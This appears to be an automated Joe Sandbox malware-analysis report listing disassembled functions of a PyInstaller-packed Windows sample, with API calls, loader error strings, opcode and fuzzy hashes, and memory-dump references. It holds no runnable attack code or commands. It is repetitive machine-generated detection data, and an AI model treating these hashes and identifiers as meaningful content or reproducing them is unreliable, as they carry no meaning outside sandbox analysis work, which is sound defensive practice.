                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7E174A5A0EB0391EB5EEB4CA890174E3A6AF45750BD45035C83E076F8EF6CB54486E3
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Message_fread_nolock
                                                                                                                                                                                                                                                                          • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                                                                                                                                                                                                                                          • API String ID: 3065259568-2316137593
                                                                                                                                                                                                                                                                          • Opcode ID: b3f65f879ef2a53b6b47127029bbb2f64602b7cc7f034776184504291ee004d8
                                                                                                                                                                                                                                                                          • Instruction ID: ac8fd50417f4c200de297956cca15e09e7ac598b86bc05ade5186ce8d316f045
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3f65f879ef2a53b6b47127029bbb2f64602b7cc7f034776184504291ee004d8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7651D5A1A0969345EB2CB759A8506FAA394EF44784FC04031EE6D477E5DE3CF50187D2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                                          • String ID: P%
                                                                                                                                                                                                                                                                          • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                                          • Opcode ID: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                                                                                                                                                                                                                                          • Instruction ID: 67ab5efed04bf2b4b6afb332e1c7d3624646aa56749b28face34012bd9128572
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D51E866618BA286D738AF26E4581BAF7A1F798B61F004131EBDE43794DF3CE045D720
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                          • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                                          • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                                          • Opcode ID: c6ac63e3974c66327622d921c1304357062fd3cb2bcbfe9c56688102bfb98152
                                                                                                                                                                                                                                                                          • Instruction ID: 2e894d19c86bc636e15fb0d5531bff102dabdf999652f7e03dfb643e1dbcfc0f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6ac63e3974c66327622d921c1304357062fd3cb2bcbfe9c56688102bfb98152
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8512C471E0C14386FB28BA5CE9542B9F6A1EB48754FC44135E6E9476E4DF3CE4808BE2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                          • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                                          • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                                          • Opcode ID: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
                                                                                                                                                                                                                                                                          • Instruction ID: 4406d120a99827282bc8624acab96c72f3910e1c129645dabef5cb47d17afb6a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9312B432E0C14396FB28BA58D1047B9F669FB48754FC44135E6EA476E4DF3CE4808BA2
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                          • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                                                                          • Opcode ID: 5341ce18229dc9ce2ff141ac699058fd8637f260b9d66149724e4ebd2e529064
                                                                                                                                                                                                                                                                          • Instruction ID: d7e1de7c033f138604bbf11661bcbe28b41e25abb5a7b25a349b8ec35ab32693
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5341ce18229dc9ce2ff141ac699058fd8637f260b9d66149724e4ebd2e529064
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC318E61B4965346EB2CBB59A4405BAE3A4EF047D4FC84031DA6D07AF5EE3CE50187E2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                                          • Opcode ID: 2b2a4badfdaa60d9abfb93841dcb65d735c0fc58e4118d1b5c2a51383b6331b7
                                                                                                                                                                                                                                                                          • Instruction ID: e6ddf114b429dcc5af8899486d0a145210bebca7d1e769e011a726782ec6c50c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b2a4badfdaa60d9abfb93841dcb65d735c0fc58e4118d1b5c2a51383b6331b7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8E183F2A0874286EB28AF69D4402ADB7A4FB44788F900135EE5D57BE5CF38E540C7D2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF7FBDDF56A,?,?,0000023382106C08,00007FF7FBDDB317,?,?,?,00007FF7FBDDB20E,?,?,?,00007FF7FBDD6452), ref: 00007FF7FBDDF34C
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF7FBDDF56A,?,?,0000023382106C08,00007FF7FBDDB317,?,?,?,00007FF7FBDDB20E,?,?,?,00007FF7FBDD6452), ref: 00007FF7FBDDF358
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                          • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                                          • Opcode ID: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
                                                                                                                                                                                                                                                                          • Instruction ID: 0ac53bade982297e0c1ee99f2cb836ef447dfc217211f35900402f89fb998ded
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44412421B19A0341EB1EEB5E98005B5A390BF49BA0FC94135DD7D877E8DE3CF44983A2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7FBDC101D), ref: 00007FF7FBDC8747
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7FBDC101D), ref: 00007FF7FBDC879E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                                                          • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                                                                          • API String ID: 626452242-27947307
                                                                                                                                                                                                                                                                          • Opcode ID: 3d8cc197ee630c3fb00dd31b72f24074ca9fe52add05c6a83a64952da4f63ba4
                                                                                                                                                                                                                                                                          • Instruction ID: 90a6c62f815d8e748c7841852735440a780a3ae01f066d9b3abcc7b017af81e9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d8cc197ee630c3fb00dd31b72f24074ca9fe52add05c6a83a64952da4f63ba4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F41B132A08B8382E728EF59B84017AF6A1FB88790F944135DAAD47BE4DF3CD441C791
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00007FF7FBDC39EA), ref: 00007FF7FBDC8C31
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDC29E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7FBDC87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF7FBDC101D), ref: 00007FF7FBDC2A14
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDC29E0: MessageBoxW.USER32 ref: 00007FF7FBDC2AF0
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00007FF7FBDC39EA), ref: 00007FF7FBDC8CA5
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                                                                          • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                                                                          • API String ID: 3723044601-27947307
                                                                                                                                                                                                                                                                          • Opcode ID: 93215b2962e715be9f5aa91d99be70836a612e16585fb8aee950a2577366c4a3
                                                                                                                                                                                                                                                                          • Instruction ID: 13b074acbeb58f17b1d20ba85deaf592e0938a88dcd6d3e03464766092e85405
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93215b2962e715be9f5aa91d99be70836a612e16585fb8aee950a2577366c4a3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD21D075B09B0780EB18EF5AE940078B261EB84B90BD44135DA2D437F5EF3CE50083E2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                                                                                                                                                                                                                                          • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                                                                                                                                                                                                                                          • API String ID: 3231891352-3501660386
                                                                                                                                                                                                                                                                          • Opcode ID: 0c183e133c5fbc1ffe3f319d699f8627423da4d6d465f0011bb75cd22a0eadb8
                                                                                                                                                                                                                                                                          • Instruction ID: 139e92edaf6af8c981208b2a852f6a888f56d658bcee73505a9e92b0b92f56e5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c183e133c5fbc1ffe3f319d699f8627423da4d6d465f0011bb75cd22a0eadb8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8251B2A4A0D64341FB5DB76D99502B9E2919F88780FD40030E97D877FAEE2CE40183E2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDC8AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7FBDC2ABB), ref: 00007FF7FBDC8B1A
                                                                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF7FBDC79A1,00000000,?,00000000,00000000,?,00007FF7FBDC154F), ref: 00007FF7FBDC747F
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDC2B30: MessageBoxW.USER32 ref: 00007FF7FBDC2C05
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7FBDC74DA
                                                                                                                                                                                                                                                                          • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7FBDC7493
                                                                                                                                                                                                                                                                          • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7FBDC7456
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                                          • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                                                                                                                                          • API String ID: 1662231829-3498232454
                                                                                                                                                                                                                                                                          • Opcode ID: 5e8575f0beacdb372a81e9debe9bb6d766e8e255e7029f60019f70bf69282784
                                                                                                                                                                                                                                                                          • Instruction ID: a874cb8e6ffcda425761ac136178035d3aafce15d5860fc016bf4fedbae75564
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e8575f0beacdb372a81e9debe9bb6d766e8e255e7029f60019f70bf69282784
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5831A691F2D74340FB2CB729A9513BAD151AF98780FC40435DA6E427F6EE2CE50486E2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF7FBDCE06A,?,?,?,00007FF7FBDCDD5C,?,?,00000001,00007FF7FBDCD979), ref: 00007FF7FBDCDE3D
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF7FBDCE06A,?,?,?,00007FF7FBDCDD5C,?,?,00000001,00007FF7FBDCD979), ref: 00007FF7FBDCDE4B
